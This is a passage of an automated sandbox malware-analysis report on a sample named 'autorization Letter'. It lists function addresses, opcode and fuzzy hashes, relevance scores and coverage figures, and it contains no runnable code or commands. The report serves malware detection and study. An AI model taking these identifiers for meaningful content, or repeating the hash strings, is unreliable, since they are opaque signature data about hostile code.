                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 48afe1ab88e8cc9aeadf9e66e7cae99faa67da1f8ed28003ad84fc84a33c110b
                                                                  • Instruction ID: 62ee907bedffea420ff9a3963f3dd7d1e3200ae95a9f732ff0938837098e7d28
                                                                  • Opcode Fuzzy Hash: 48afe1ab88e8cc9aeadf9e66e7cae99faa67da1f8ed28003ad84fc84a33c110b
                                                                  • Instruction Fuzzy Hash: D1F06DB0E4420ADFEB04DFA9C949A7FBFF5EB08300F104569A909E3341D7309A00CB91
                                                                  Function 058A8D48 Relevance: .0, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                  • Instruction ID: 4243ceffdd30f352615e2fe6667d750750fc4abca0ae9b7f9b7c733986b7bd1f
                                                                  • Opcode Fuzzy Hash: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                  • Instruction Fuzzy Hash: 0601B675D00609DFCB40EFACC54589DBBF4FF49210B1185AAE859EB321E770AA44CF91
                                                                  Function 058ABFD0 Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 83956817f2a9dd5eec28b3337a28fdcc3d328d498f122e9eb4e5408e4a01243f
                                                                  • Instruction ID: ec34bbc6086d556e5a9ad4378b66ae9a4558016b760857267b558e253a5f2b7d
                                                                  • Opcode Fuzzy Hash: 83956817f2a9dd5eec28b3337a28fdcc3d328d498f122e9eb4e5408e4a01243f
                                                                  • Instruction Fuzzy Hash: FEF0FF35214640CFC709DB28D588C49BBE6EF4A70970689A9E40ACB372CB72EC44CF40
                                                                  Function 058A473C Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6a94f1c2f53bda7eb3b2da7154a56b923afe2b74d398b85d8c63b9cd55d82260
                                                                  • Instruction ID: 19d89f1cd191d9c0bc52ec794a1d22a37a3b79363fe03610fc4b46ff4ed714ed
                                                                  • Opcode Fuzzy Hash: 6a94f1c2f53bda7eb3b2da7154a56b923afe2b74d398b85d8c63b9cd55d82260
                                                                  • Instruction Fuzzy Hash: 7EF0E237A0914CAFEF02DF80DC54AE97F32FB98301F004096EA4297165C3B18D25DB11
                                                                  Function 058A6880 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f687c0f1ad7dfce6bfd06c897c3416d3915a46c301bdc1061022f7942fe6a8b4
                                                                  • Instruction ID: 87a05651010de0d4122dbd5e3b6d97c4b22614dae36618f31ea3a53c08ed3461
                                                                  • Opcode Fuzzy Hash: f687c0f1ad7dfce6bfd06c897c3416d3915a46c301bdc1061022f7942fe6a8b4
                                                                  • Instruction Fuzzy Hash: B2E02062F047540FE719917BA8504A67BEF7EC5401308C15ED885C7719E9606D0647C4
                                                                  Function 058A6890 Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 885c0b05f318dceb0860a2faeb48977a94c75d42ec83e3beb58c085f8e44c20e
                                                                  • Instruction ID: 237366b8b8687fd7aea7ae89f4c94786febd7f34bb81309d14ef2057b002fb95
                                                                  • Opcode Fuzzy Hash: 885c0b05f318dceb0860a2faeb48977a94c75d42ec83e3beb58c085f8e44c20e
                                                                  • Instruction Fuzzy Hash: 79E06571B006150B574CE76A984049AB6DBAED8510358C16EC40DCB628ED30984147C4
                                                                  Function 058A6534 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5bea6c8512b44a9cf9f0e0f68e4ec393b6b2a4d3724760c97fdba19427f6aa70
                                                                  • Instruction ID: 0e6fb4f9eedda0a309571e5c171ffb35b53ea7573a0744de973b5246d7aa7351
                                                                  • Opcode Fuzzy Hash: 5bea6c8512b44a9cf9f0e0f68e4ec393b6b2a4d3724760c97fdba19427f6aa70
                                                                  • Instruction Fuzzy Hash: 9BE0C2313597049FC32CDA1CE880C7ABBEEEF883103148979F20AC7220DB60FC088684
                                                                  Function 058A9D30 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 970c82cb5f3510eb5c1ea9909098110980fce6e6b63eb4a2e339434544d5dff4
                                                                  • Instruction ID: 26bfc25bac601377d23faf0cc22762ea60f74c9d5f8070f5e20b5c941db26316
                                                                  • Opcode Fuzzy Hash: 970c82cb5f3510eb5c1ea9909098110980fce6e6b63eb4a2e339434544d5dff4
                                                                  • Instruction Fuzzy Hash: 57E04F35B186108FC718DB5CE480AA677E9AF48311B2586A9F909C7770E760DC1A8784
                                                                  Function 058A4518 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b01acd0b3696e975e34426ede06ab3e2e7e10f7e2dc8ab15ea42c7114e4811f8
                                                                  • Instruction ID: 64c3eaadade6ab0a7f605ed757352370bc987d03339764d10a6937b546653794
                                                                  • Opcode Fuzzy Hash: b01acd0b3696e975e34426ede06ab3e2e7e10f7e2dc8ab15ea42c7114e4811f8
                                                                  • Instruction Fuzzy Hash: FFE04F32644248AFDF028F64D800EE63BB5FF06211B028092F9948B232D272EC21EB61
                                                                  Function 058A4710 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c906f2a4c90fcb046b71b70daece7abec47f645389eb338a8b78e134cd3fbd6
                                                                  • Instruction ID: 86c831601b2f0422654e1ab3a5e724491f930643142ba7ca9448ed94c1c29307
                                                                  • Opcode Fuzzy Hash: 9c906f2a4c90fcb046b71b70daece7abec47f645389eb338a8b78e134cd3fbd6
                                                                  • Instruction Fuzzy Hash: 3CD0A732300224476F2536B8740847D73CF9A45566344047EF90EC6341DE668C0043C5
                                                                  Function 058A46F3 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 08a9ff94ce09f37de5b4a27e4f027f21186b72dba76e20984c86427662d44210
                                                                  • Instruction ID: f352387f488b3a8c2b086ec488e9b7e69bcdfce55d7c059e74a2b9dee9ecbb25
                                                                  • Opcode Fuzzy Hash: 08a9ff94ce09f37de5b4a27e4f027f21186b72dba76e20984c86427662d44210
                                                                  • Instruction Fuzzy Hash: D4E0123AA0110DABEF01DFC0E945BDEBB72FB88315F208011EA01672A4C7724E65DB91
                                                                  Function 058A0EB0 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3fbd862b4ff9972398def8de603b96881e29cc7127eee119baea71fae25b5bc6
                                                                  • Instruction ID: 856117afbba9c9b6bfd63da5b946d270fba52ae3f3248db23cc91fc796fb86a6
                                                                  • Opcode Fuzzy Hash: 3fbd862b4ff9972398def8de603b96881e29cc7127eee119baea71fae25b5bc6
                                                                  • Instruction Fuzzy Hash: 80D02323F1831417E70520DC58146F7368E4B86620F190077490DC37859C959C4203F3
                                                                  Function 058A4700 Relevance: .0, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a443b698fec4f6e7dba1528a74381c90a11b68ced442db33ad30a449e610976
                                                                  • Instruction ID: fa04727c2b1e0df9a6e0625e37f0e2bc5d2d808e9cd3c8d98f3e08cfa94ed347
                                                                  • Opcode Fuzzy Hash: 2a443b698fec4f6e7dba1528a74381c90a11b68ced442db33ad30a449e610976
                                                                  • Instruction Fuzzy Hash: 37D023313041500F9F31597C7900DFA37FD5E4515A30543BEDC0EC6215D95D4C2457C5
                                                                  Function 058A70A1 Relevance: .0, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2aa01970d21c123f159b90b80bace5260c2fc1aa29724b73053cf2d8f4ab55ea
                                                                  • Instruction ID: fba8b01f542d75a85cb5a23bb376e4939f91f13a9dd6bef32158774c5efada85
                                                                  • Opcode Fuzzy Hash: 2aa01970d21c123f159b90b80bace5260c2fc1aa29724b73053cf2d8f4ab55ea
                                                                  • Instruction Fuzzy Hash: DEE0C235214214DFCB058B68E009D993FE8EF09220B1480BAFC09C7321CF31AC00C7C9
                                                                  Function 058A70B0 Relevance: .0, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 54440c057619b39e78206b242a106ecba630dd39f0dc35df7384da759f73f05d
                                                                  • Instruction ID: ff6f735a14f6b6a152b86efc272511377f0c5fb12c608466c6ec234104ee5593
                                                                  • Opcode Fuzzy Hash: 54440c057619b39e78206b242a106ecba630dd39f0dc35df7384da759f73f05d
                                                                  • Instruction Fuzzy Hash: F9D0C9363101249F9B059B68E508CAA7BEDEB4D6613118066F909C7321CE71EC108BD4
                                                                  Function 058A6071 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 449e675386f93e7636a5df1ba7fb28a7f4525feecd3e14dd7e967169d7b88797
                                                                  • Instruction ID: d1d54f232621eb07c0d029e94f91bd9fe004a9b3600932af385df64ce3aa3df5
                                                                  • Opcode Fuzzy Hash: 449e675386f93e7636a5df1ba7fb28a7f4525feecd3e14dd7e967169d7b88797
                                                                  • Instruction Fuzzy Hash: 88D01276DA97830FE712263598042683EB0AB372D578C00E28010D515FFA194494D322
                                                                  Function 058A4528 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
                                                                  • Instruction ID: 103967bf13f508402a192ef6221732069224ae084a114efb1bafc53f37aadea3
                                                                  • Opcode Fuzzy Hash: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
                                                                  • Instruction Fuzzy Hash: BCD0C93614010CEFCB01CF95D844D9A3BBAFF48720F008054FA084B232C332E821EB90
                                                                  Function 058A4F60 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3631f2d15d6023ecc873328bf911cb2e2f20488e309a7fb33310b66cf784668f
                                                                  • Instruction ID: 23fa2bdbaf5a155ebc697532fb5d70b785f56e3277df76ae959b2ab0cf117374
                                                                  • Opcode Fuzzy Hash: 3631f2d15d6023ecc873328bf911cb2e2f20488e309a7fb33310b66cf784668f
                                                                  • Instruction Fuzzy Hash: B4C080867057C01AEF4755750818444193785CA400FCF94D54C81CE262D0DDCC450321
                                                                  Function 058A0EC0 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64b08f306fecc5059d47c7496ca6ab2798b6e5fbfede51ffbfd17f8dd9c15bd7
                                                                  • Instruction ID: 1c9be3a76ee7aa6b49f0faebe9d835d582b482c95b06e4df37bd6c78151e3b26
                                                                  • Opcode Fuzzy Hash: 64b08f306fecc5059d47c7496ca6ab2798b6e5fbfede51ffbfd17f8dd9c15bd7
                                                                  • Instruction Fuzzy Hash: BEB09B2231433D13DA0971DD64146FD728E4785564F000067951DD77415CD59C4103DB
                                                                  Function 058A46EA Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                                                                  • Instruction ID: aaae3fb2ea0c4738b2ab52d8b83c9c30d9afddb35997d4b89c841ed032a14f7b
                                                                  • Opcode Fuzzy Hash: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                                                                  • Instruction Fuzzy Hash: 69B0923BA0401C89EF008A84B4423EEF760E780269F104023C6119204193B2016496D1
                                                                  Function 058A4A88 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5850c4b38b810ca4f3d013a0f0b2b06e0d88a926151f3524c0b1e7985c98373c
                                                                  • Instruction ID: 3b97a18c23a5373eb9a9cb3b29cc394b763a148fc36703396ca8ad942de085c3
                                                                  • Opcode Fuzzy Hash: 5850c4b38b810ca4f3d013a0f0b2b06e0d88a926151f3524c0b1e7985c98373c
                                                                  • Instruction Fuzzy Hash: 0AB0121A754905017D04F9390CDC576001B9EC0200BC0EC141D01C012C89ACAC08000A

                                                                  Non-executed Functions

                                                                  Function 079367F8 Relevance: .6, Instructions: 588COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 41b34e40c38c8ffc8a6cc00e245f5b0136cee5887393d406b374cd955879a816
                                                                  • Instruction ID: 12b5c534ede09141c160d17cd5f91cfb092a540a736bca00c9dd015e67ac8c36
                                                                  • Opcode Fuzzy Hash: 41b34e40c38c8ffc8a6cc00e245f5b0136cee5887393d406b374cd955879a816
                                                                  • Instruction Fuzzy Hash: BF328BB0B006059FDB14DB79C494BAEB7FAAF88304F1484A9D559EB3A1CB34EC45CB61
                                                                  Function 07930040 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 14194782d0a9585a3fe048f1e886148308a47e5b2079804f440e97ca0297105e
                                                                  • Instruction ID: 0af50e97110ded099647113ce15aca95aad3663e0c815e254b012664001cf949
                                                                  • Opcode Fuzzy Hash: 14194782d0a9585a3fe048f1e886148308a47e5b2079804f440e97ca0297105e
                                                                  • Instruction Fuzzy Hash: FAE108B4E001198FDB14DFA9C5809AEFBB2FF89305F248269D414AB356D735AD41CF61
                                                                  Function 016BD3A4 Relevance: .3, Instructions: 264COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b29609f88b44e184bcef1793128150f8e16c79f3a6fed261bde973e24fe03ae
                                                                  • Instruction ID: 62b4449510532bee1a35a9be40e91717bd43292e167d01bad814d59eb92d99b3
                                                                  • Opcode Fuzzy Hash: 2b29609f88b44e184bcef1793128150f8e16c79f3a6fed261bde973e24fe03ae
                                                                  • Instruction Fuzzy Hash: 82A16C36A102158FCF05DFB8CD905DEBBB2FF89300B1585AAE901AB275DB719996CB40
                                                                  Function 07930006 Relevance: .2, Instructions: 153COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 872002458dadbe20d227b0004282b49ea4f29dbc79f56bb431408788a508eafe
                                                                  • Instruction ID: fb8530d1765fad62823b6f062edf9b3ef988a31cdc1348d312545ce116f8c91f
                                                                  • Opcode Fuzzy Hash: 872002458dadbe20d227b0004282b49ea4f29dbc79f56bb431408788a508eafe
                                                                  • Instruction Fuzzy Hash: 655150B0E042598FDB15CFA9C9805AEBBF2FF85314F1481AAD418AB256D7349E41CF61
                                                                  Function 058A7C50 Relevance: 41.7, Strings: 33, Instructions: 438COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-2711123852
                                                                  • Opcode ID: 89a94903aaa78b5f19de0bbbe17be32270c3279a610961f03ea7493f18881f3f
                                                                  • Instruction ID: 1c31778c78d2b9ec475bd09839c6a9811a0205be5a422557eb998b8cdfedc6a4
                                                                  • Opcode Fuzzy Hash: 89a94903aaa78b5f19de0bbbe17be32270c3279a610961f03ea7493f18881f3f
                                                                  • Instruction Fuzzy Hash: 0A125470A1021A8FCB5CEF78E990A9D7BB2FF94704F504568C049AB264DF746D85CFA2
                                                                  Function 058A7C60 Relevance: 41.7, Strings: 33, Instructions: 434COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-2711123852
                                                                  • Opcode ID: 5c4d1de71c895733db4a98e73bb73daf4347772f8a311954e4f54abef5dd3f83
                                                                  • Instruction ID: 25a641c259cd0ea0cfcde4623e49084dd71f0f12c208eb2c98e43facf8199677
                                                                  • Opcode Fuzzy Hash: 5c4d1de71c895733db4a98e73bb73daf4347772f8a311954e4f54abef5dd3f83
                                                                  • Instruction Fuzzy Hash: 17124470A1021A8FCB5CEF78E990A9D7BB2FF94704F504568C049AB264DF746D85CFA2
                                                                  Function 058A26E0 Relevance: 12.7, Strings: 10, Instructions: 183COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-3121157708
                                                                  • Opcode ID: 8a380f5fef8db3aa1b157153d03fad902c94d635f0f211858eac0d6317b35603
                                                                  • Instruction ID: 46c4c8fa2ec2ed6f7d675bcb27146ad5f3bb5076dbc094698e4945d98ee4a1f6
                                                                  • Opcode Fuzzy Hash: 8a380f5fef8db3aa1b157153d03fad902c94d635f0f211858eac0d6317b35603
                                                                  • Instruction Fuzzy Hash: D5717E31E0020B8FCB18EFB9D8905DDBBB2FF95300F614629D055AB264EB747986CB91
                                                                  Function 058A26F0 Relevance: 12.7, Strings: 10, Instructions: 172COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                  • API String ID: 0-3121157708
                                                                  • Opcode ID: 79a2259006f7982b81ad35308c34f4e515a5cf953739763d0d125490a4b93d16
                                                                  • Instruction ID: 1024dbd8e4eadda77cba3af397b822c8b9304a847137137580878e6b919ff4b5
                                                                  • Opcode Fuzzy Hash: 79a2259006f7982b81ad35308c34f4e515a5cf953739763d0d125490a4b93d16
                                                                  • Instruction Fuzzy Hash: 13717F30E0020B8BCB18EFB9D9505DDBBB2FF95700F614618D055AB264DB747985CB91

                                                                  Execution Graph

                                                                  Execution Coverage:11%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:142
                                                                  Total number of Limit Nodes:15
